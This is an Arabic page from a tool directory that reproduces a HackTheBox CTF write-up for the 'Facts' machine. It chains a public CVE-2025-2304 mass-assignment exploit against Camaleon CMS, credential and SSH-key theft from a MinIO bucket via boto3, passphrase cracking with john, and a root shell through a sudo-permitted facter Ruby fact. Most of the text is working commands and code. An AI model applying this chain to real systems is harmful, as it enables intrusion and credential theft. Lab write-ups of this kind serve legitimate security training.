Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
HTB-Facts-Writeup — شرح لجهاز Facts على HackTheBox — CVE-2025-2304، تعداد MinIO S3، كسر مفاتيح SSH، وتصعيد الامتيازات عبر facter. | Kitploit
أدوات/GitHubGitHub/karimelsheikh1/htb-facts-writeup
كسر كلمات المرورتصعيد الامتيازاتالاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقأمن السحابةالتعلم والتعليم
GitHubkarimelsheikh1/htb-facts-writeup

HTB-Facts-Writeup

منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

شرح لجهاز Facts على HackTheBox — CVE-2025-2304، تعداد MinIO S3، كسر مفاتيح SSH، وتصعيد الامتيازات عبر facter.

عرض المستودع

HackTheBox — شرح جهاز Facts

HackTheBox Difficulty OS

معلومات الجهاز

الحقلالتفاصيل
الاسمFacts
نظام التشغيلLinux
الصعوبةسهلة
الإصدارالموسم 10
متقاعدلا

نظرة عامة على سلسلة الهجوم

root@kitploit:~
Recon → Web Enumeration → CVE-2025-2304 (Mass Assignment) → S3/MinIO Credential Leak → SSH Key Extraction → Passphrase Cracking → User Shell → facter Sudo Abuse → Root

الأدوات المستخدمة


الاستطلاع

فحص المنافذ

root@kitploit:~
sudo nmap -p- --min-rate 5000 -T4 <TARGET_IP> -oN ports.nmap
sudo nmap -sV -sC -p 22,80,54321 <TARGET_IP>

النتائج:

root@kitploit:~
22/tcp    open  ssh     OpenSSH 9.9p1 Ubuntu
80/tcp    open  http    nginx 1.26.3 (Camaleon CMS)
54321/tcp open  http    MinIO S3 Server
root@kitploit:~
echo "<TARGET_IP> facts.htb" | sudo tee -a /etc/hosts

تعداد الويب

root@kitploit:~
feroxbuster -u http://facts.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 40
curl -s http://facts.htb/robots.txt
curl -s http://facts.htb/sitemap.xml

النتائج الرئيسية:

  • نظام إدارة المحتوى المحدد: Camaleon CMS 2.9.0
  • لوحة الإدارة: http://facts.htb/admin/login
  • صفحة التسجيل: http://facts.htb/admin/register

الوصول الأولي

الخطوة 1 — إنشاء حساب

قم بزيارة http://facts.htb/admin/register وأنشئ حسابًا. لاحظ وجود كابتشا — سجّل عبر المتصفح.

الخطوة 2 — CVE-2025-2304 (رفع الامتيازات عبر التخصيص الجماعي)

تستخدم نقطة النهاية updated_ajax الدالة permit! التي تسمح بتحديث جميع المعاملات بما في ذلك role.

root@kitploit:~
git clone https://github.com/Alien0ne/CVE-2025-2304
cd CVE-2025-2304
python3 exploit.py -u http://facts.htb -U <username> -P <password> -e

الإخراج:

root@kitploit:~
[+] Login confirmed
    Current User Role: client
[+] Updated User Role: admin
[+] Extracting S3 Credentials
    s3 access key: AKIAA5CA83CCFE35CD69
    s3 secret key: zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n
    s3 endpoint:   http://localhost:54321

تعداد السحابة — MinIO S3

المنفذ 54321 يستضيف خادم MinIO متوافقًا مع S3. باستخدام البيانات المسرّبة:

root@kitploit:~
import boto3
from botocore.client import Config

s3 = boto3.client(
    's3',
    endpoint_url='http://facts.htb:54321',
    aws_access_key_id='AKIAA5CA83CCFE35CD69',
    aws_secret_access_key='zOCRxURBa6wha6rksxj6kCmwvdAQNYX6NPw2o2+n',
    config=Config(signature_version='s3v4'),
    region_name='us-east-1'
)

paginator = s3.get_paginator('list_objects_v2')
for page in paginator.paginate(Bucket='internal'):
    for o in page.get('Contents', []):
        if 'info-etags' not in o['Key']:
            print(o['Key'])
            s3.download_file('internal', o['Key'], '/tmp/' + o['Key'].replace('/', '_'))

الملفات الرئيسية التي تم العثور عليها:

root@kitploit:~
.ssh/authorized_keys
.ssh/id_ed25519        ← SSH private key
.profile
.bashrc

كسر مفتاح SSH

root@kitploit:~
chmod 600 /tmp/.ssh_id_ed25519
ssh2john /tmp/.ssh_id_ed25519 > ssh.hash
john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt

عبارة المرور المكسورة: dragonballz


شل المستخدم

root@kitploit:~
ssh -i /tmp/.ssh_id_ed25519 [email protected]
# Enter passphrase: dragonballz
root@kitploit:~
cat /home/william/user.txt

رفع الامتيازات

التعداد

root@kitploit:~
sudo -l
root@kitploit:~
(ALL) NOPASSWD: /usr/bin/facter

الاستغلال — حقيقة مخصصة لـ facter (تنفيذ كود Ruby)

يقوم Facter بتحميل الحقائق المخصصة كسكربتات Ruby. وبما أنه يمكننا تشغيله كجذر بدون كلمة مرور، فإننا نحقن كود Ruby تعسفيًا:

root@kitploit:~
mkdir -p /tmp/facts
cat > /tmp/facts/pwn.rb << 'EOF'
Facter.add(:pwn) do
  setcode do
    exec("/bin/bash -p")
  end
end
EOF

sudo facter --custom-dir=/tmp/facts pwn

تم الحصول على شل جذر!

root@kitploit:~
whoami   # root
cat /root/root.txt

الدروس المستفادة

  • ثغرات التخصيص الجماعي تسمح برفع الامتيازات عندما لا تتم تصفية المدخلات بشكل صحيح
  • يمكن لدلاء S3/MinIO ذات الإعدادات الخاطئة كشف ملفات حساسة بما في ذلك مفاتيح SSH الخاصة
  • يمكن كسر عبارات المرور الضعيفة على مفاتيح SSH باستخدام قوائم كلمات شائعة مثل rockyou
  • يجب دائمًا فحص ثنائيات sudo NOPASSWD بحثًا عن احتمالية إساءة الاستخدام
  • يمكن أن يؤدي ربط سوء الإعدادات الصغيرة إلى اختراق النظام بالكامل

المراجع

  • CVE-2025-2304 — التخصيص الجماعي في Camaleon CMS
  • GTFOBins — facter
  • HackTheBox

هذا الشرح للأغراض التعليمية فقط. قم دائمًا بإجراء اختبارات الأمان على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.

تنزيل الأداة
الأداةالغرض
Nmapفحص المنافذ واكتشاف الخدمات
Feroxbusterتعداد الدلائل على الويب
CVE-2025-2304 PoCرفع الامتيازات في Camaleon CMS
boto3 (Python)تعداد MinIO/S3 وتنزيل الملفات
ssh2johnتحويل مفتاح SSH إلى تجزئة قابلة للكسر
John the Ripperكسر عبارة مرور مفتاح SSH
facterرفع الامتيازات عبر سوء إعداد sudo